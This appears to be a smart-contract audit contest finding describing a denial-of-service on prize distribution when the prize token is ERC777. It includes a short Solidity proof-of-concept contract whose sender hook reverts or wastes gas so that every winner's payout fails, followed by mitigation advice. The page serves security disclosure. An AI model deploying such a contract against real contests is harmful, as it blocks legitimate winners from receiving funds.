Sparkn

CodeFox Inc.

DeFiFoundryProxy

15,000 USDC

View results

Previous Next

Submission Details

Severity: medium

DOS attack on the contest Distribution in case it is an ERC777 token

johnnytime

Summary

If an ERC777 token will be added as a supported asset and someone launched a contest with that token as the prize, a single malicious winner can create a DOS attack and disrupt the entire prize distribution process by controlling the execution flow.

Vulnerability Details

With ERC777 tokens the user (winner) can get the control flow before sending token and after receiving tokens, using ERC77 hooks. This creates attack vectors that require extra caution.

For example, a malicious winner using this hook (callback) can decide to revert the transaction or waste all the gas that was left, effectively preventing the distribution process from continuing and preventing from all the winners from receiving their rewards.

POC

Deploy this malicious smart contract and pass it's as one of the winners of a contest, and the whole distribution process will fail:

pragma solidity ^0.8.13;

import "@openzeppelin/contracts/token/ERC20/IERC20.sol";

import "@openzeppelin/contracts/interfaces/IERC1820Registry.sol";

contract AttackSparknContest {

IERC1820Registry internal constant _ERC1820_REGISTRY = IERC1820Registry(0x1820a4B7618BdE71Dce8cdc73aAB6C95905faD24);

constructor() {

_ERC1820_REGISTRY.setInterfaceImplementer(

address(this),

keccak256("ERC777TokensSender"),

address(this)

);

}

function tokensToSend(address, address, address, uint256, bytes calldata, bytes calldata) external {

// Option 1 - revert

revert("No prizes for anyone!!!");

// Option 2 - Waste gas

uint256 letsWaste;

for(uint256 i; i <= 9999999; i++) {

letsWaste += i;

}

Impact

In certain contests, one malicious winner can prevent all other winners from receiving their rewards.

Tools Used

Manual Review

Recommendations

Option 1 - Don't allow ERC777 tokens

In the ProxyFactory.sol constructor use EIP165 to ensure that no ERC777 tokens exist within the _whitelistedTokens array

Option 2 - Winner-initiated Withdrawal

Implement a system where winners actively withdraw their rewards, shifting from the current approach of organizer reward distribution (requires big refactoring).

Prize pool breakdown

Total prize

15,000 USDC

nSLOC

194

77 USDC / LOC

High Medium

14,000 USDC

Low

1,000 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.